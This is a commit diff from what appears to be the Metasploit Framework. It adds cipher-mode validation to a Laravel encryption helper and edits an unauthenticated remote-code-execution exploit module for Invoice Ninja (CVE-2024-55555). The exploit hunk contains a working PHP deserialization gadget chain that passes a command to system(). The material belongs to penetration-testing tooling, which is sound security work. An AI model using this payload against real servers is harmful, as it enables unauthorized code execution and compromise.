added code sugesstions from dledda-r7

h00die-gr3y · h00die-gr3y · commit 79411eace8cb · 2025-02-24T15:51:32.000Z
diff --git a/lib/msf/core/exploit/laravel_crypto_killer.rb b/lib/msf/core/exploit/laravel_crypto_killer.rb
@@ -13,6 +13,15 @@
 # Recoded in Ruby by h00die-gr3y (h00die.gr3y[at]gmail.com)
 ###
 module Msf::Exploit::LaravelCryptoKiller
+  # Check if cipher is valid
+  # @param [String] <cipher_mode>  The cipher_mode
+  #
+  # @return [Boolean] true if mode is ok or false if mode is not valid
+  def valid_cipher?(cipher_mode)
+    ciphers ||= OpenSSL::Cipher.ciphers
+    ciphers.include?(cipher_mode.downcase)
+  end
+
   # Perform AES encryption in CBC mode (compatible with Laravel)
   # @param [String] <value> The value that will be encrypted
   # @param [String] <iv> The IV parameter used for encryption
@@ -21,6 +30,11 @@ module Msf::Exploit::LaravelCryptoKiller
   #
   # @return [String] The encrypted value or nil if unsuccessful
   def aes_encrypt(value, iv, key, cipher_mode)
+    # Check cipher mode
+    unless valid_cipher?(cipher_mode)
+      vprint_error("Cipher is not valid: #{cipher_mode}")
+      return
+    end
     # Create a new AES cipher in CBC mode
     cipher = OpenSSL::Cipher.new(cipher_mode)
     cipher.encrypt
@@ -45,6 +59,11 @@ def aes_encrypt(value, iv, key, cipher_mode)
   #
   # @return [String] The decrypted value or nil if unsuccessful
   def aes_decrypt(encrypted_value, iv, key, cipher_mode)
+    # Check cipher mode
+    unless valid_cipher?(cipher_mode)
+      vprint_error("Cipher is not valid: #{cipher_mode}")
+      return
+    end
     # Create AES cipher in CBC mode
     cipher = OpenSSL::Cipher.new(cipher_mode)
     cipher.decrypt
diff --git a/modules/exploits/linux/http/invoiceninja_unauth_rce_cve_2024_55555.rb b/modules/exploits/linux/http/invoiceninja_unauth_rce_cve_2024_55555.rb
@@ -149,7 +149,7 @@ def exploit
     pl = payload.encoded
     pl = "php -r \"#{payload.encoded.gsub('"', '\"').gsub('$', '\$')}\"" if target['Type'] == :php
     pl_len = pl.length
-    laravel_payload = "a:2:{i:7;O:40:\"Illuminate\\Broadcasting\\PendingBroadcast\":1:{s:9:\"\x00*\x00events\";O:35:\"Illuminate\\Database\\DatabaseManager\":2:{s:6:\"\x00*\x00app\";a:1:{s:6:\"config\";a:2:{s:16:\"database.default\";s:6:\"system\";s:20:\"database.connections\";a:1:{s:6:\"system\";a:1:{i:0;s:#{pl_len}:\"#{pl}\";}}}}s:13:\"\x00*\x00extensions\";a:1:{s:6:\"system\";s:12:\"array_filter\";}}}i:7;i:7;}"
+    laravel_payload = %(a:2:{i:7;O:40:"Illuminate\\Broadcasting\\PendingBroadcast":1:{s:9:"\x00*\x00events";O:35:"Illuminate\\Database\\DatabaseManager":2:{s:6:"\x00*\x00app";a:1:{s:6:"config";a:2:{s:16:"database.default";s:6:"system";s:20:"database.connections";a:1:{s:6:"system";a:1:{i:0;s:#{pl_len}:"#{pl}";}}}}s:13:"\x00*\x00extensions";a:1:{s:6:"system";s:12:"array_filter";}}}i:7;i:7;})
     b64_laravel_payload = Base64.strict_encode64(laravel_payload)
     laravel_cipher = laravel_encrypt(b64_laravel_payload, valid_app_key, cipher_mode)
     fail_with(Failure::BadConfig, 'Laravel encryption failed.') if laravel_cipher.nil?
